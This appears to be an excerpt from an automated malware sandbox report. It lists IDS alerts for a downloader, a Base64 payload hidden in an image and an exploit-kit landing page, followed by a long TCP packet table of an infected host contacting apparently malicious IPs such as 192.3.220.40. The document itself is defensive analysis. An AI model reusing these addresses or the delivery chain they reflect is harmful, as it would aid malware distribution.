                                                                                                                                                                                                                    2024-10-08T15:24:04.397505+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249175178.237.33.5080TCP
                                                                                                                                                                                                                    2024-10-08T15:24:20.543211+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.242443192.168.2.2249176TCP
                                                                                                                                                                                                                    2024-10-08T15:24:21.488970+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11192.3.220.4080192.168.2.2249177TCP
                                                                                                                                                                                                                    2024-10-08T15:24:21.488970+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11192.3.220.4080192.168.2.2249177TCP

                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.066248894 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.066287994 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.066355944 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.072715044 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.072726965 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.677503109 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.677700043 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.683018923 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.683043003 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.683459044 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.683533907 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.755467892 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.803401947 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.150717974 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.150799990 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.150852919 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.154107094 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.190813065 CEST49161443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.190841913 CEST44349161188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.214597940 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.219691992 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.219808102 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.224842072 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.229779959 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699470997 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699526072 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699541092 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699640036 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699651957 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699665070 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699676991 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699676991 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699678898 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699696064 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699708939 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699708939 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699740887 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699740887 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699812889 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699826956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699881077 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699881077 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.705652952 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.705888033 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.705924034 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.705924034 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.706034899 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.706536055 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.706578970 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790857077 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790878057 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790890932 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790924072 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790936947 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790942907 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790942907 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790982008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.790982008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.791115999 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.791171074 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.791276932 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.791290998 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.791332006 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792117119 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792130947 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792143106 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792155981 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792191029 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792191029 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792211056 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792223930 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792237997 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792274952 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.792274952 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793179035 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793195963 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793215036 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793225050 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793236971 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793236971 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793267965 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793268919 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793268919 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793792009 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793816090 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793828011 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793858051 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793858051 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793870926 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.795974016 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.796061993 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881931067 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881959915 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881973028 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881983995 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881994963 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882009983 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882074118 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882074118 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882075071 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882076025 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882184029 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882282019 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882303953 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882316113 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882328033 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882359028 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882359028 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882498980 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882519960 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882555008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882555008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882575035 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882586956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882600069 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882677078 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882677078 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882694006 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882707119 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882719040 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882730961 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882747889 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882766962 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883193970 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883208036 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883220911 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883258104 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883258104 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883282900 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883296013 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883310080 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883322001 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883349895 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883349895 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883438110 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883450031 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883456945 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883466005 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883487940 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883563995 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884129047 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884144068 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884155035 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884166956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884192944 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884192944 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884222031 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884282112 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884390116 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.127115965 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.127168894 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.127245903 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.133897066 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.133897066 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.142226934 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.142247915 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.630146027 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.630295992 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.637792110 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.637813091 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.638200998 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.642036915 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.829835892 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.871402025 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229732037 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229806900 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229818106 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229846954 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.288863897 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.288888931 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.394150019 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.399003983 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.399058104 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.415469885 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.420751095 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864491940 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864507914 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864537954 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864551067 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864571095 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864582062 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864609003 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864624977 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864640951 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864640951 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864669085 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864686012 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864701986 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864702940 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864718914 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864738941 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.869491100 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.869565010 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.869570971 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.869584084 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.869620085 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.870868921 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959613085 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959646940 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959666014 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959666967 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959691048 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959697008 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959737062 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959748030 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959774971 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.959784985 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960098982 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960110903 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960130930 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960146904 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960163116 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960176945 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960365057 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960397959 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960566998 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960578918 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960601091 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960628986 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960645914 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.960654020 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961358070 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961370945 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961391926 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961412907 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961422920 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961504936 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961518049 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961551905 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.961563110 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962286949 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962299109 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962323904 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962344885 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962353945 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962429047 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962445021 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962480068 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.962491035 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.966373920 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.966418982 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.966540098 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.966598988 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042691946 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042706966 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042728901 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042824984 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042831898 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042840004 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042855024 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042855024 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042869091 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042885065 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.042907000 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043004036 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043016911 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043029070 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043050051 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043065071 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.043065071 CEST4916480192.168.2.22192.3.220.40
